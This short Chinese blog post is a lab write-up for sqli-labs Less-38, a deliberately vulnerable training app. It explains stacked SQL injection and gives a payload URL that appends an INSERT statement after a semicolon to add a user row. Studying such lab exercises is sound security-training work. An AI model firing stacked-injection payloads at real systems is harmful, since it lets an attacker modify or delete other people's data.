我是靠谱客的博主 如意战斗机,这篇文章主要介绍sqli-labs-master/Less-38 堆叠注入,现在分享给大家,希望可以做个参考。

sql语句中,分号代表着语句的结束。在分号后面再写一条sql语句,就成了堆叠注入

堆叠注入和union 比较相似,但是堆叠可以有更多的操作,比如插入数据,删除数据等,union 则只是用于查询

访问http://localhost/sqli-labs-master/Less-38/?id=1

在id后面追加一条sql

http://localhost/sqli-labs-master/Less-38/?id=1'; insert into users(id,username,password) values('38','user38','pass38') --+

此时,数据库中已插入了数据

 

 

最后

以上就是如意战斗机最近收集整理的关于sqli-labs-master/Less-38 堆叠注入的全部内容,更多相关sqli-labs-master/Less-38内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(39)

评论列表共有 0 条评论

立即
投稿
返回
顶部